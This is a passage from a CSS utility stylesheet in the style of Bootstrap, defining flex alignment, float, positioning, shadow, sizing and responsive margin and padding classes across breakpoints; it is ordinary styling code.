-ms-flex-align: center !important; align-items: center !important; } .align-items-xl-baseline { -ms-flex-align: baseline !important; align-items: baseline !important; } .align-items-xl-stretch { -ms-flex-align: stretch !important; align-items: stretch !important; } .align-content-xl-start { -ms-flex-line-pack: start !important; align-content: flex-start !important; } .align-content-xl-end { -ms-flex-line-pack: end !important; align-content: flex-end !important; } .align-content-xl-center { -ms-flex-line-pack: center !important; align-content: center !important; } .align-content-xl-between { -ms-flex-line-pack: justify !important; align-content: space-between !important; } .align-content-xl-around { -ms-flex-line-pack: distribute !important; align-content: space-around !important; } .align-content-xl-stretch { -ms-flex-line-pack: stretch !important; align-content: stretch !important; } .align-self-xl-auto { -ms-flex-item-align: auto !important; align-self: auto !important; } .align-self-xl-start { -ms-flex-item-align: start !important; align-self: flex-start !important; } .align-self-xl-end { -ms-flex-item-align: end !important; align-self: flex-end !important; } .align-self-xl-center { -ms-flex-item-align: center !important; align-self: center !important; } .align-self-xl-baseline { -ms-flex-item-align: baseline !important; align-self: baseline !important; } .align-self-xl-stretch { -ms-flex-item-align: stretch !important; align-self: stretch !important; } } .float-left { float: left !important; } .float-right { float: right !important; } .float-none { float: none !important; } @media (min-width: 576px) { .float-sm-left { float: left !important; } .float-sm-right { float: right !important; } .float-sm-none { float: none !important; } } @media (min-width: 768px) { .float-md-left { float: left !important; } .float-md-right { float: right !important; } .float-md-none { float: none !important; } } @media (min-width: 992px) { .float-lg-left { float: left !important; } .float-lg-right { float: right !important; } .float-lg-none { float: none !important; } } @media (min-width: 1200px) { .float-xl-left { float: left !important; } .float-xl-right { float: right !important; } .float-xl-none { float: none !important; } } .overflow-auto { overflow: auto !important; } .overflow-hidden { overflow: hidden !important; } .position-static { position: static !important; } .position-relative { position: relative !important; } .position-absolute { position: absolute !important; } .position-fixed { position: fixed !important; } .position-sticky { position: -webkit-sticky !important; position: sticky !important; } .fixed-top { position: fixed; top: 0; right: 0; left: 0; z-index: 1030; } .fixed-bottom { position: fixed; right: 0; bottom: 0; left: 0; z-index: 1030; } @supports ((position: -webkit-sticky) or (position: sticky)) { .sticky-top { position: -webkit-sticky; position: sticky; top: 0; z-index: 1020; } } .sr-only { position: absolute; width: 1px; height: 1px; padding: 0; margin: -1px; overflow: hidden; clip: rect(0, 0, 0, 0); white-space: nowrap; border: 0; } .sr-only-focusable:active, .sr-only-focusable:focus { position: static; width: auto; height: auto; overflow: visible; clip: auto; white-space: normal; } .shadow-sm { box-shadow: 0 0.125rem 0.25rem rgba(0, 0, 0, 0.075) !important; } .shadow { box-shadow: 0 0.5rem 1rem rgba(0, 0, 0, 0.15) !important; } .shadow-lg { box-shadow: 0 1rem 3rem rgba(0, 0, 0, 0.175) !important; } .shadow-none { box-shadow: none !important; } .w-25 { width: 25% !important; } .w-50 { width: 50% !important; } .w-75 { width: 75% !important; } .w-100 { width: 100% !important; } .w-auto { width: auto !important; } .h-25 { height: 25% !important; } .h-50 { height: 50% !important; } .h-75 { height: 75% !important; } .h-100 { height: 100% !important; } .h-auto { height: auto !important; } .mw-100 { max-width: 100% !important; } .mh-100 { max-height: 100% !important; } .min-vw-100 { min-width: 100vw !important; } .min-vh-100 { min-height: 100vh !important; } .vw-100 { width: 100vw !important; } .vh-100 { height: 100vh !important; } .stretched-link::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; z-index: 1; pointer-events: auto; content: ""; background-color: rgba(0, 0, 0, 0); } .m-0 { margin: 0 !important; } .mt-0, .my-0 { margin-top: 0 !important; } .mr-0, .mx-0 { margin-right: 0 !important; } .mb-0, .my-0 { margin-bottom: 0 !important; } .ml-0, .mx-0 { margin-left: 0 !important; } .m-1 { margin: 0.25rem !important; } .mt-1, .my-1 { margin-top: 0.25rem !important; } .mr-1, .mx-1 { margin-right: 0.25rem !important; } .mb-1, .my-1 { margin-bottom: 0.25rem !important; } .ml-1, .mx-1 { margin-left: 0.25rem !important; } .m-2 { margin: 0.5rem !important; } .mt-2, .my-2 { margin-top: 0.5rem !important; } .mr-2, .mx-2 { margin-right: 0.5rem !important; } .mb-2, .my-2 { margin-bottom: 0.5rem !important; } .ml-2, .mx-2 { margin-left: 0.5rem !important; } .m-3 { margin: 1rem !important; } .mt-3, .my-3 { margin-top: 1rem !important; } .mr-3, .mx-3 { margin-right: 1rem !important; } .mb-3, .my-3 { margin-bottom: 1rem !important; } .ml-3, .mx-3 { margin-left: 1rem !important; } .m-4 { margin: 1.5rem !important; } .mt-4, .my-4 { margin-top: 1.5rem !important; } .mr-4, .mx-4 { margin-right: 1.5rem !important; } .mb-4, .my-4 { margin-bottom: 1.5rem !important; } .ml-4, .mx-4 { margin-left: 1.5rem !important; } .m-5 { margin: 3rem !important; } .mt-5, .my-5 { margin-top: 3rem !important; } .mr-5, .mx-5 { margin-right: 3rem !important; } .mb-5, .my-5 { margin-bottom: 3rem !important; } .ml-5, .mx-5 { margin-left: 3rem !important; } .p-0 { padding: 0 !important; } .pt-0, .py-0 { padding-top: 0 !important; } .pr-0, .px-0 { padding-right: 0 !important; } .pb-0, .py-0 { padding-bottom: 0 !important; } .pl-0, .px-0 { padding-left: 0 !important; } .p-1 { padding: 0.25rem !important; } .pt-1, .py-1 { padding-top: 0.25rem !important; } .pr-1, .px-1 { padding-right: 0.25rem !important; } .pb-1, .py-1 { padding-bottom: 0.25rem !important; } .pl-1, .px-1 { padding-left: 0.25rem !important; } .p-2 { padding: 0.5rem !important; } .pt-2, .py-2 { padding-top: 0.5rem !important; } .pr-2, .px-2 { padding-right: 0.5rem !important; } .pb-2, .py-2 { padding-bottom: 0.5rem !important; } .pl-2, .px-2 { padding-left: 0.5rem !important; } .p-3 { padding: 1rem !important; } .pt-3, .py-3 { padding-top: 1rem !important; } .pr-3, .px-3 { padding-right: 1rem !important; } .pb-3, .py-3 { padding-bottom: 1rem !important; } .pl-3, .px-3 { padding-left: 1rem !important; } .p-4 { padding: 1.5rem !important; } .pt-4, .py-4 { padding-top: 1.5rem !important; } .pr-4, .px-4 { padding-right: 1.5rem !important; } .pb-4, .py-4 { padding-bottom: 1.5rem !important; } .pl-4, .px-4 { padding-left: 1.5rem !important; } .p-5 { padding: 3rem !important; } .pt-5, .py-5 { padding-top: 3rem !important; } .pr-5, .px-5 { padding-right: 3rem !important; } .pb-5, .py-5 { padding-bottom: 3rem !important; } .pl-5, .px-5 { padding-left: 3rem !important; } .m-n1 { margin: -0.25rem !important; } .mt-n1, .my-n1 { margin-top: -0.25rem !important; } .mr-n1, .mx-n1 { margin-right: -0.25rem !important; } .mb-n1, .my-n1 { margin-bottom: -0.25rem !important; } .ml-n1, .mx-n1 { margin-left: -0.25rem !important; } .m-n2 { margin: -0.5rem !important; } .mt-n2, .my-n2 { margin-top: -0.5rem !important; } .mr-n2, .mx-n2 { margin-right: -0.5rem !important; } .mb-n2, .my-n2 { margin-bottom: -0.5rem !important; } .ml-n2, .mx-n2 { margin-left: -0.5rem !important; } .m-n3 { margin: -1rem !important; } .mt-n3, .my-n3 { margin-top: -1rem !important; } .mr-n3, .mx-n3 { margin-right: -1rem !important; } .mb-n3, .my-n3 { margin-bottom: -1rem !important; } .ml-n3, .mx-n3 { margin-left: -1rem !important; } .m-n4 { margin: -1.5rem !important; } .mt-n4, .my-n4 { margin-top: -1.5rem !important; } .mr-n4, .mx-n4 { margin-right: -1.5rem !important; } .mb-n4, .my-n4 { margin-bottom: -1.5rem !important; } .ml-n4, .mx-n4 { margin-left: -1.5rem !important; } .m-n5 { margin: -3rem !important; } .mt-n5, .my-n5 { margin-top: -3rem !important; } .mr-n5, .mx-n5 { margin-right: -3rem !important; } .mb-n5, .my-n5 { margin-bottom: -3rem !important; } .ml-n5, .mx-n5 { margin-left: -3rem !important; } .m-auto { margin: auto !important; } .mt-auto, .my-auto { margin-top: auto !important; } .mr-auto, .mx-auto { margin-right: auto !important; } .mb-auto, .my-auto { margin-bottom: auto !important; } .ml-auto, .mx-auto { margin-left: auto !important; } @media (min-width: 576px) { .m-sm-0 { margin: 0 !important; } .mt-sm-0, .my-sm-0 { margin-top: 0 !important; } .mr-sm-0, .mx-sm-0 { margin-right: 0 !important; } .mb-sm-0, .my-sm-0 { margin-bottom: 0 !important; } .ml-sm-0, .mx-sm-0 { margin-left: 0 !important; } .m-sm-1 { margin: 0.25rem !important; } .mt-sm-1, .my-sm-1 { margin-top: 0.25rem !important; } .mr-sm-1, .mx-sm-1 { margin-right: 0.25rem !important; } .mb-sm-1, .my-sm-1 { margin-bottom: 0.25rem !important; } .ml-sm-1, .mx-sm-1 { margin-left: 0.25rem !important; } .m-sm-2 { margin: 0.5rem !important; } .mt-sm-2, .my-sm-2 { margin-top: 0.5rem !important; } .mr-sm-2, .mx-sm-2 { margin-right: 0.5rem !important; } .mb-sm-2, .my-sm-2 { margin-bottom: 0.5rem !important; } .ml-sm-2, .mx-sm-2 { margin-left: 0.5rem !important; } .m-sm-3 { margin: 1rem !important; } .mt-sm-3, .my-sm-3 { margin-top: 1rem !important; } .mr-sm-3, .mx-sm-3 { margin-right: 1rem !important; } .mb-sm-3, .my-sm-3 { margin-bottom: 1rem !important; } .ml-sm-3, .mx-sm-3 { margin-left: 1rem !important; } .m-sm-4 { margin: 1.5rem !important; } .mt-sm-4, .my-sm-4 { margin-top: 1.5rem !important; } .mr-sm-4, .mx-sm-4 { margin-right: 1.5rem !important; } .mb-sm-4, .my-sm-4 { margin-bottom: 1.5rem !important; } .ml-sm-4, .mx-sm-4 { margin-left: 1.5rem !important; } .m-sm-5 { margin: 3rem !important; } .mt-sm-5, .my-sm-5 { margin-top: 3rem !important; } .mr-sm-5, .mx-sm-5 { margin-right: 3rem !important; } .mb-sm-5, .my-sm-5 { margin-bottom: 3rem !important; } .ml-sm-5, .mx-sm-5 { margin-left: 3rem !important; } .p-sm-0 { padding: 0 !important; } .pt-sm-0, .py-sm-0 { padding-top: 0 !important; } .pr-sm-0, .px-sm-0 { padding-right: 0 !important; } .pb-sm-0, .py-sm-0 { padding-bottom: 0 !important; } .pl-sm-0, .px-sm-0 { padding-left: 0 !important; } .p-sm-1 { padding: 0.25rem !important; } .pt-sm-1, .py-sm-1 { padding-top: 0.25rem !important; } .pr-sm-1, .px-sm-1 { padding-right: 0.25rem !important; } .pb-sm-1, .py-sm-1 { padding-bottom: 0.25rem !important; } .pl-sm-1, .px-sm-1 { padding-left: 0.25rem !important; } .p-sm-2 { padding: 0.5rem !important; } .pt-sm-2, .py-sm-2 { padding-top: 0.5rem !important; } .pr-sm-2, .px-sm-2 { padding-right: 0.5rem !important; } .pb-sm-2, .py-sm-2 { padding-bottom: 0.5rem !important; } .pl-sm-2, .px-sm-2 { padding-left: 0.5rem !important; } .p-sm-3 { padding: 1rem !important; } .pt-sm-3, .py-sm-3 { padding-top: 1rem !important; } .pr-sm-3, .px-sm-3 { padding-right: 1rem !important; } .pb-sm-3, .py-sm-3 { padding-bottom: 1rem !important; } .pl-sm-3, .px-sm-3 { padding-left: 1rem !important; } .p-sm-4 { padding: 1.5rem !important; } .pt-sm-4, .py-sm-4 { padding-top: 1.5rem !important; } .pr-sm-4, .px-sm-4 { padding-right: 1.5rem !important; } .pb-sm-4, .py-sm-4 { padding-bottom: 1.5rem !important; } .pl-sm-4, .px-sm-4 { padding-left: 1.5rem !important; } .p-sm-5 { padding: 3rem !important; } .pt-sm-5, .py-sm-5 { padding-top: 3rem !important; } .pr-sm-5, .px-sm-5 { padding-right: 3rem !important; } .pb-sm-5, .py-sm-5 { padding-bottom: 3rem !important; } .pl-sm-5, .px-sm-5 { padding-left: 3rem !important; } .m-sm-n1 { margin: -0.25rem !important; } .mt-sm-n1, .my-sm-n1 { margin-top: -0.25rem !important; } .mr-sm-n1, .mx-sm-n1 { margin-right: -0.25rem !important; } .mb-sm-n1, .my-sm-n1 { margin-bottom: -0.25rem !important; } .ml-sm-n1, .mx-sm-n1 { margin-left: -0.25rem !important; } .m-sm-n2 { margin: -0.5rem !important; } .mt-sm-n2, .my-sm-n2 { margin-top: -0.5rem !important; } .mr-sm-n2, .mx-sm-n2 { margin-right: -0.5rem !important; } .mb-sm-n2, .my-sm-n2 { margin-bottom: -0.5rem !important; } .ml-sm-n2, .mx-sm-n2 { margin-left: -0.5rem !important; } .m-sm-n3 { margin: -1rem !important; } .mt-sm-n3, .my-sm-n3 { margin-top: -1rem !important; } .mr-sm-n3, .mx-sm-n3 { margin-right: -1rem !important; } .mb-sm-n3, .my-sm-n3 { margin-bottom: -1rem !important; } .ml-sm-n3, .mx-sm-n3 { margin-left: -1rem !important; } .m-sm-n4 { margin: -1.5rem !important; } .mt-sm-n4, .my-sm-n4 { margin-top: -1.5rem !important; } .mr-sm-n4, .mx-sm-n4 { margin-right: -1.5rem !important; } .mb-sm-n4, .my-sm-n4 { margin-bottom: -1.5rem !important; } .ml-sm-n4, .mx-sm-n4 { margin-left: -1.5rem !important; } .m-sm-n5 { margin: -3rem !important; } .mt-sm-n5, .my-sm-n5 { margin-top: -3rem !important; } .mr-sm-n5, .mx-sm-n5 { margin-right: -3rem !important; } .mb-sm-n5, .my-sm-n5 { margin-bottom: -3rem !important; } .ml-sm-n5, .mx-sm-n5 { margin-left: -3rem !important; } .m-sm-auto { margin: auto !important; } .mt-sm-auto, .my-sm-auto { margin-top: auto !important; } .mr-sm-auto, .mx-sm-auto { margin-right: auto !important; } .mb-sm-auto, .my-sm-auto { margin-bottom: auto !important; } .ml-sm-auto, .mx-sm-auto { margin-left: auto !important; } } @media (min-width: 768px) { .m-md-0 { margin: 0 !important; } .mt-md-0, .my-md-0 { margin-top: 0 !important; } .mr-md-0, .mx-md-0 { margin-right: 0 !important; } .mb-md-0, .my-md-0 { margin-bottom: 0 !important; } .ml-md-0, .mx-md-0 { margin-left: 0 !important; } .m-md-1 { margin: 0.25rem !important; } .mt-md-1, .my-md-1 { margin-top: 0.25rem !important; } .mr-md-1, .mx-md-1 { margin-right: 0.25rem !important; } .mb-md-1, .my-md-1 { margin-bottom: 0.25rem !important; } .ml-md-1, .mx-md-1 { margin-left: 0.25rem !important; } .m-md-2 { margin: 0.5rem !important; } .mt-md-2, .my-md-2 { margin-top: 0.5rem !important; } .mr-md-2, .mx-md-2 { margin-right: 0.5rem !important; } .mb-md-2, .my-md-2 { margin-bottom: 0.5rem !important; } .ml-md-2, .mx-md-2 { margin-left: 0.5rem !important; } .m-md-3 { margin: 1rem !important; } .mt-md-3, .my-md-3 { margin-top: 1rem !important; } .mr-md-3, .mx-md-3 { margin-right: 1rem !important; } .mb-md-3, .my-md-3 { margin-bottom: 1rem !important; } .ml-md-3, .mx-md-3 { margin-left: 1rem !important; } .m-md-4 { margin: 1.5rem !important; } .mt-md-4, .my-md-4 { margin-top: 1.5rem !important; } .mr-md-4, .mx-md-4 { margin-right: 1.5rem !important; } .mb-md-4, .my-md-4 { margin-bottom: 1.5rem !important; } .ml-md-4, .mx-md-4 { margin-left: 1.5rem !important; } .m-md-5 { margin: 3rem !important; } .mt-md-5, .my-md-5 { margin-top: 3rem !important; } .mr-md-5, .mx-md-5 { margin-right: 3rem !important; } .mb-md-5, .my-md-5 { margin-bottom: 3rem !important; } .ml-md-5, .mx-md-5 { margin-left: 3rem !important; } .p-md-0 { padding: 0 !important; } .pt-md-0, .py-md-0 { padding-top: 0 !important; } .pr-md-0, .px-md-0 { padding-right: 0 !important; } .pb-md-0, .py-md-0 { padding-bottom: 0 !important; } .pl-md-0, .px-md-0 { padding-left: 0 !important; } .p-md-1 { padding: 0.25rem !important; } .pt-md-1, .py-md-1 { padding-top: 0.25rem !important; } .pr-md-1, .px-md-1 { padding-right: 0.25rem !important; } .pb-md-1, .py-md-1 { padding-bottom: 0.25rem !important; } .pl-md-1, .px-md-1 { padding-left: 0.25rem !important; } .p-md-2 { padding: 0.5rem !important; } .pt-md-2, .py-md-2 { padding-top: 0.5rem !important; } .pr-md-2, .px-md-2 { padding-right: 0.5rem !important; } .pb-md-2, .py-md-2 { padding-bottom: 0.5rem !important; } .pl-md-2, .px-md-2 { padding-left: 0.5rem !important; } .p-md-3 { padding: 1rem !important; } .pt-md-3, .py-md-3 { padding-top: 1rem !important; } .pr-md-3, .px-md-3 { padding-right: 1rem !important; } .pb-md-3, .py-md-3 { padding-bottom: 1rem !important; } .pl-md-3, .px-md-3 { padding-left: 1rem !important; } .p-md-4 { padding: 1.5rem !important; } .pt-md-4, .py-md-4 { padding-top: 1.5rem !important; } .pr-md-4, .px-md-4 { padding-right: 1.5rem !important; } .pb-md-4, .py-md-4 { padding-bottom: 1.5rem !important; } .pl-md-4, .px-md-4 { padding-left: 1.5rem !important; } .p-md-5 { padding: 3rem !important; } .pt-md-5, .py-md-5 { padding-top: 3rem !important; } .pr-md-5, .px-md-5 { padding-right: 3rem !important; } .pb-md-5, .py-md-5 { padding-bottom: 3rem !important; } .pl-md-5, .px-md-5 { padding-left: 3rem !important; } .m-md-n1 { margin: -0.25rem !important; } .mt-md-n1, .my-md-n1 { margin-top: -0.25rem !important; } .mr-md-n1, .mx-md-n1 { margin-right: -0.25rem !important; } .mb-md-n1, .my-md-n1 { margin-bottom: -0.25rem !important; } .ml-md-n1, .mx-md-n1 { margin-left: -0.25rem !important; } .m-md-n2 { margin: -0.5rem !important; } .mt-md-n2, .my-md-n2 { margin-top: -0.5rem !important; } .mr-md-n2, .mx-md-n2 { margin-right: -0.5rem !important; } .mb-md-n2, .my-md-n2 { margin-bottom: -0.5rem !important; } .ml-md-n2, .mx-md-n2 { margin-left: -0.5rem !important; } .m-md-n3 { margin: -1rem !important; } .mt-md-n3, .my-md-n3 { margin-top: -1rem !important; } .mr-md-n3, .mx-md-n3 { margin-right: -1rem !important; } .mb-md-n3, .my-md-n3 { margin-bottom: -1rem !important; } .ml-md-n3, .mx-md-n3 { margin-left: -1rem !important; } .m-md-n4 { margin: -1.5rem !important; } .mt-md-n4, .my-md-n4 { margin-top: -1.5rem !important; } .mr-md-n4, .mx-md-n4 { margin-right: -1.5rem !important; } .mb-md-n4, .my-md-n4 { margin-bottom: -1.5rem !important; } .ml-md-n4, .mx-md-n4 { margin-left: -1.5rem !important; } .m-md-n5 { margin: -3rem !important; } .mt-md-n5, .my-md-n5 { margin-top: -3rem !important; } .mr-md-n5, .mx-md-n5 { margin-right: -3rem !important; } .mb-md-n5, .my-md-n5 { margin-bottom: -3rem !important; } .ml-md-n5, .mx-md-n5 { margin-left: -3rem !important; } .m-md-auto { margin: auto !important; } .mt-md-auto, .my-md-auto { margin-top: auto !important; } .mr-md-auto, .mx-md-auto { margin-right: auto !important; } .mb-md-auto, .my-md-auto { margin-bottom: auto !important; } .ml-md-auto, .mx-md-auto { margin-left: auto !important; } } @media (min-width: 992px) { .m-lg-0 { margin: 0 !important; } .mt-lg-0, .my-lg-0 { margin-top: 0 !important; } .mr-lg-0, .mx-lg-0 { margin-right: 0 !important; } .mb-lg-0, .my-lg-0 { margin-bottom: 0 !important; } .ml-lg-0, .mx-lg-0 { margin-left: 0 !important; } .m-lg-1 { margin: 0.25rem !important; } .mt-lg-1, .my-lg-1 { margin-top: 0.25rem !important; } .mr-lg-1, .mx-lg-1 { margin-right: 0.25rem !important; } .mb-lg-1, .my-lg-1 { margin-bottom: 0.25rem !important; } .ml-lg-1, .mx-lg-1 { margin-left: 0.25rem !important; } .m-lg-2 { margin: 0.5rem !important; } .mt-lg-2, .my-lg-2 { margin-top: 0.5rem !important; } .mr-lg-2, .mx-lg-2 { margin-right: 0.5rem !important; } .mb-lg-2, .my-lg-2 { margin-bottom: 0.5rem !important; } .ml-lg-2, .mx-lg-2 { margin-left: 0.5rem !important; } .m-lg-3 { margin: 1rem !important; } .mt-lg-3, .my-lg-3 { margin-top: 1rem !important; } .mr-lg-3, .mx-lg-3 { margin-right: 1rem !important; } .mb-lg-3, .my-lg-3 { margin-bottom: 1rem !important; } .ml-lg-3, .mx-lg-3 { margin-left: 1rem !important; } .m-lg-4 { margin: 1.5rem !important; } .mt-lg-4, .my-lg-4 { margin-top: 1.5rem !important; } .mr-lg-4, .mx-lg-4 { margin-right: 1.5rem !important; } .mb-lg-4, .my-lg-4 { margin-bottom: 1.5rem !important; } .ml-lg-4, .mx-lg-4 { margin-left: 1.5rem !important; } .m-lg-5 { margin: 3rem !important; } .mt-lg-5, .my-lg-5 { margin-top: 3rem !important; } .mr-lg-5, .mx-lg-5 { margin-right: 3rem !important; } .mb-lg-5, .my-lg-5 { margin-bottom: 3rem !important; } .ml-lg-5, .mx-lg-5 { margin-left: 3rem !important; } .p-lg-0 { padding: 0 !important; } .pt-lg-0, .py-lg-0 { padding-top: 0 !important; } .pr-lg-0, .px-lg-0 { padding-right: 0 !important; } .pb-lg-0, .py-lg-0 { padding-bottom: 0 !important; } .pl-lg-0, .px-lg-0 { padding-left: 0 !important; } .p-lg-1 { padding: 0.25rem !important; } .pt-lg-1, .py-lg-1 { padding-top: 0.25rem !important; } .pr-lg-1, .px-lg-1 { padding-right: 0.25rem !important; } .pb-lg-1, .py-lg-1 { padding-bottom: 0.25rem !important; } .pl-lg-1, .px-lg-1 { padding-left: 0.25rem !important; } .p-lg-2 { padding: 0.5rem !important; } .pt-lg-2, .py-lg-2 { padding-top: 0.5rem !important; } .pr-lg-2, .px-lg-2 { padding-right: 0.5rem !important; } .pb-lg-2, .py-lg-2 { padding-bottom: 0.5rem !important; } .pl-lg-2, .px-lg-2 { padding-left: 0.5rem !important; } .p-lg-3 { padding: 1rem !important; } .pt-lg-3, .py-lg-3 { padding-top: 1rem !important; } .pr-lg-3, .px-lg-3 { padding-right: 1rem !important; } .pb-lg-3, .py-lg-3 { padding-bottom: 1rem !important; } .pl-lg-3, .px-lg-3 { padding-left: 1rem !important; } .p-lg-4 { padding: 1.5rem !important; } .pt-lg-4, .py-lg-4 { padding-top: 1.5rem !important; } .pr-lg-4, .px-lg-4 { padding-right: 1.5rem !important; } .pb-lg-4, .py-lg-4 { padding-bottom: 1.5rem !important; } .pl-lg-4, .px-lg-4 { padding-left: 1.5rem !important; } .p-lg-5 { padding: 3rem !important; } .pt-lg-5, .py-lg-5 { padding-top: 3rem !important; } .pr-lg-5, .px-lg-5 { padding-right: 3rem !important; } .pb-lg-5, .py-lg-5 { padding-bottom: 3rem !important; } .pl-lg-5, .px-lg-5 { padding-left: 3rem !important; } .m-lg-n1 { margin: -0.25rem !important; } .mt-lg-n1, .my-lg-n1 { margin-top: -0.25rem !important; } .mr-lg-n1, .mx-lg-n1 { margin-right: -0.25rem !important; } .mb-lg-n1, .my-lg-n1 { margin-bottom: -0.25rem !important; } .ml-lg-n1, .mx-lg-n1 { margin-left: -0.25rem !important; } .m-lg-n2 { margin: -0.5rem !important; } .mt-lg-n2, .my-lg-n2 { margin-top: -0.5rem !important; } .mr-lg-n2, .mx-lg-n2 { margin-right: -0.5rem !important; } .mb-lg-n2, .my-lg-n2 { margin-bottom: -0.5rem !important; } .ml-lg-n2, .mx-lg-n2 { margin-left: -0.5rem !important; } .m-lg-n3 { margin: -1rem !important; } .mt-lg-n3, .my-lg-n3 { margin-top: -1rem !important; } .mr-lg-n3, .mx-lg-n3 { margin-right: -1rem !important; } .mb-lg-n3, .my-lg-n3 { margin-bottom: -1rem !important; } .ml-lg-n3, .mx-lg-n3 { margin-left: -1rem !important; } .m-lg-n4 { margin: -1.5rem !important; } .mt-lg-n4, .my-lg-n4 { margin-top: -1.5rem !important; } .mr-lg-n4, .mx-lg-n4 { margin-right: -1.5rem !important; } .mb-lg-n4, .my-lg-n4 { margin-bottom: -1.5rem !important; } .ml-lg-n4, .mx-lg-n4 { margin-left: -1.5rem !important; } .m-lg-n5 { margin: -3rem !important; } .mt-lg-n5, .my-lg-n5 { margin-top: -3rem !important; } .mr-lg-n5, .mx-lg-n5 { margin-right: -3rem !important; } .mb-lg-n5, .my-lg-n5 { margin-bottom: -3rem !important; } .ml-lg-n5, .mx-lg-n5 { margin-left: -3rem !important; } .m-lg-auto { margin: auto !important; } .mt-lg-auto, .my-lg-auto { margin-top: auto !important; } .mr-lg-auto, .mx-lg-auto { margin-right: auto !important; } .mb-lg-auto, .my-lg-auto { margin-bottom: auto !important; } .ml-lg-auto, .mx-lg-auto { margin-left: auto !important; } } @media (min-width: 1200px) { .m-xl-0 { margin: 0 !important; } .mt-xl-0, .my-xl-0 { margin-top: 0 !important; } .mr-xl-0, .mx-xl-0 { margin-right: 0 !important; } .mb-xl-0, .my-xl-0 { margin-bottom: 0 !important; } .ml-xl-0, .mx-xl-0 { margin-left: 0 !important; } .m-xl-1 { margin: 0.25rem !important; } .mt-xl-1, .my-xl-1 { margin-top: 0.25rem !important; } .mr-xl-1, .mx-xl-1 { margin-right: 0.25rem !important; } .mb-xl-1, .my-xl-1 { margin-bottom: 0.25rem !important; } .ml-xl-1, .mx-xl-1 { margin-left: 0.25rem !important; } .m-xl-2 { margin: 0.5rem !important; } .mt-xl-2, .my-xl-2 { margin-top: 0.5rem !important; } .mr-xl-2, .mx-xl-2 { margin-right: 0.5rem !important; } .mb-xl-2, .my-xl-2 { margin-bottom: 0.5rem !important; } .ml-xl-2, .mx-xl-2 { margin-left: 0.5rem !important; } .m-xl-3 { margin: 1rem !important; } .mt-xl-3, .my-xl-3 { margin-top: 1rem !important; } .mr-xl-3, .mx-xl-3 { margin-right: 1rem !important; } .mb-xl-3, .my-xl-3 { margin-bottom: 1rem !important; } .ml-xl-3, .mx-xl-3 { margin-left: 1rem !important; } .m-xl-4 { margin: 1.5rem !important; } .mt-xl-4, .my-xl-4 { margin-top: 1.5rem !important; } .mr-xl-4, .mx-xl-4 { margin-right: 1.5rem !important; } .mb-xl-4, .my-xl-4 { margin-bottom: 1.5rem !important; } .ml-xl-4, .mx-xl-4 { margin-left: 1.5rem !important; } .m-xl-5 { margin: 3rem !important; } .mt-xl-5, .my-xl-5 { margin-top: 3rem !important; } .mr-xl-5, .mx-xl-5 { margin-right: 3rem !important; } .mb-xl-5, .my-xl-5 { margin-bottom: 3rem !important; } .ml-xl-5, .mx-xl-5 { margin-left: 3rem !important; } .p-xl-0 { padding: 0 !important; } .pt-xl-0, .py-xl-0 { padding-top: 0 !important; } .pr-xl-0, .px-xl-0 { padding-right: 0 !important; } .pb-xl-0, .py-xl-0 { padding-bottom: 0 !important; } .pl-xl-0, .px-xl-0 { padding-left: 0 !important; } .p-xl-1 { padding: 0.25rem !important; } .pt-xl-1, .py-xl-1 { padding-top: 0.25rem !important; } .pr-xl-1, .px-xl-1 { padding-right: 0.25rem !important; } .pb-xl-1, .py-xl-1 { padding-bottom: 0.25rem !important; } .pl-xl-1, .px-xl-1 { padding-left: 0.25rem !important; } .p-xl-2 { padding: 0.5rem !important; } .pt-xl-2, .py-xl-2 { padding-top: 0.5rem !important; } .pr-xl-2, .px-xl-2 { padding-right: 0.5rem !important; } .pb-xl-2, .py-xl-2 { padding-bottom: 0.5rem !important; } .pl-xl-2, .px-xl-2 { padding-left: 0.5rem !important; } .p-xl-3 { padding: 1rem !important; } .pt-xl-3, .py-xl-3 { padding-top: 1rem !important; } .pr-xl-3, .px-xl-3 { padding-right: 1rem !important; } .pb-xl-3, .py-xl-3 { padding-bottom: 1rem !important; } .pl-xl-3, .px-xl-3 { padding-left: 1rem !important; } .p-xl-4 { padding: 1.5rem !important; } .pt-xl-4, .py-xl-4 { padding-top: 1.5rem !important; } .pr-xl-4, .px-xl-4 { padding-right: 1.5rem !important; } .pb-xl-4, .py-xl-4 { padding-bottom: 1.5rem !important; } .pl-xl-4, .px-xl-4 { padding-left: 1.5rem !important; } .p-xl-5 { padding: 3rem !important; } .pt-xl-5, .py-xl-5 { padding-top: 3rem !important; } .pr-xl-5, .px-xl-5 { padding-right: 3rem !important; } .pb-xl-5, .py-xl-5 { padding-bottom: 3rem !important; } .pl-xl-5, .px-xl-5 { padding-left: 3rem !important; } .m-xl-n1 { margin: -0.25rem !important; } .mt-xl-n1, .my-xl-n1 { margin-top: -0.25rem !important; } .mr-xl-n1, .mx-xl-n1 { margin-right: -0.25rem !important; } .mb-xl-n1, .my-xl-n1 { margin-bottom: -0.25rem !important; } .ml-xl-n1, .mx-xl-n1 { margin-left: -0.25rem !important; } .m-xl-n2 { margin: -0.5rem !important; } .mt-xl-n2, .my-xl-n2 { margin-top: -0.5rem !important; } .mr-xl-n2, .mx-xl-n2 { margin-right: -0.5rem !important; } .mb-xl-n2, .my-xl-n2 { margin-bottom: -0.5rem !important; } .ml-xl-n2, .mx-xl-n2 { margin-left: -0.5rem !important; } .m-xl-n3 { margin: -1rem !important; } .mt-xl-n3, .my-xl-n3 { margin-top: -1rem !important; } .mr-xl-n3, .mx-xl-n3 { margin-right: -1rem !important; } .mb-xl-n3, .my-xl-n3 { margin-bottom: -1rem !important; } .ml-xl-n3, .mx-xl-n3 { margin-left: -1rem !important; } .m-xl-n4 { margin: -1.5rem !important; } .mt-xl-n4, .my-xl-n4 { margin-top: -1.5rem !important; } .mr-xl-n4, .mx-xl-n4 { margin-right: -1.5rem !important; } .mb-xl-n4, .my-xl-n4 { margin-bottom: -1.5rem !important; } .ml-xl-n4, .mx-xl-n4 { margin-left: -1.5rem !important; } .m-xl-n5 { margin: -3rem !important; } .mt-xl-n5, .my-xl-n5 { margin-top: -3rem !important; } .mr-xl-n5, .mx-xl-n5 { margin-right: -3rem !important; } .mb-xl-n5, .my-xl-n5 { margin-bottom: -3rem !important; } .ml-xl-n5, .mx-xl-n5 { margin-left: -3rem !important; } .m-xl-auto { margin: auto !important; } .mt-xl-auto, .my-xl-auto { margin-top: auto !important; } .mr-xl-auto, .mx-xl-auto { margin-right: auto !important; } .mb-xl-auto, .my-xl-auto { margin-bottom: auto !important; } .ml-xl-auto, .mx-xl-auto { margin-left: auto !important; } } .text-monospace { font-family: SFMono-Regular, 